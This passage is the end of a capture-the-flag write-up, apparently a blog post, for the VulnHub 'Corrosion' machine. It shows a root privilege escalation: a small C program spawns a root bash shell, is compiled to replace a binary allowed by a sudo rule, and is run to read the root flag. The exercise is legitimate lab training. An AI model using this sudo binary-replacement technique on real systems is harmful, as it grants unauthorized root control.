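    randy_groups = {"randy", "adm", "cdrom", "dip", "plugdev", "lpadmin", "sambashare"}
    for rule, listing in ((TOOLS_RULE, TOOLS_LISTING), (SAFE_RULE, SAFE_LISTING)):
        print(rule, "->", audit_sudo_rule(rule, parse_listing(listing), "randy", randy_groups) or ["ok"])
```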

randy@corrosion:~/tools$ nano custombinary.c
randy@corrosion:~/tools$ cat custombinary.c 
#include <unistd.h>
#include <stdlib.h>

/* Replacement for easysysinfo: invoked through the sudo rule it already runs
   as root; setuid/setgid(0) keep that identity for the interactive shell. */
int main(void)
{
  setuid(0);
  setgid(0);
  system("bash -i");
  return 0;
}
randy@corrosion:~/tools$ gcc custombinary.c -o easysysinfo
randy@corrosion:~/tools$ ls
custombinary.c  easysysinfo  easysysinfo.py
randy@corrosion:~/tools$ sudo /home/randy/tools/easysysinfo
root@corrosion:/home/randy/tools# cd /root
root@corrosion:~# ls -alh
total 52K
drwx------  7 root root 4.0K Jul 30  2021 .
drwxr-xr-x 20 root root 4.0K Jul 29  2021 ..
-rw-r--r--  1 root root  461 Jul 30  2021 .bash_history
-rw-r--r--  1 root root 3.1K Aug 14  2019 .bashrc
drwx------  2 root root 4.0K Apr 20  2021 .cache
drwx------  3 root root 4.0K Jul 30  2021 .config
drwxr-xr-x  2 root root 4.0K Jul 30  2021 creds
drwxr-xr-x  3 root root 4.0K Jul 29  2021 .local
-rw-r--r--  1 root root   10 Nov 16 11:30 logs.txt
-rw-r--r--  1 root root  161 Sep 16  2020 .profile
-rw-r--r--  1 root root  251 Jul 30  2021 root.txt
-rw-r--r--  1 root root   66 Jul 30  2021 .selected_editor
drwxr-xr-x  3 root root 4.0K Jul 29  2021 snap
-rw-r--r--  1 root root    0 Jul 30  2021 .sudo_as_admin_successful
root@corrosion:~# cat root.txt
FLAG: 4NJSA99SD7922197D7S90PLAWE 

Congrats! Hope you enjoyed my first machine posted on VulnHub! 
Ping me on twitter @proxyprgrammer for any suggestions.

Youtube: https://www.youtube.com/c/ProxyProgrammer
Twitter: https://twitter.com/proxyprgrammer
root@corrosion:~# 


Privilege escalation succeeded!

posted @ 2022-11-16 19:15  Jason_huawen